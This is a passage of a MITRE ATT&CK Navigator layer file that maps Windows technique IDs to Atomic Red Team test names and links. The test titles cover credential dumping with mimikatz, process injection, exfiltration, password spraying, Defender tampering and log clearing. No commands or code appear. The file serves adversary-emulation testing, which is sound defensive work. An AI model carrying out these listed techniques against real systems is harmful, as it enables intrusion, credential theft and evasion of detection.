Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":20,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 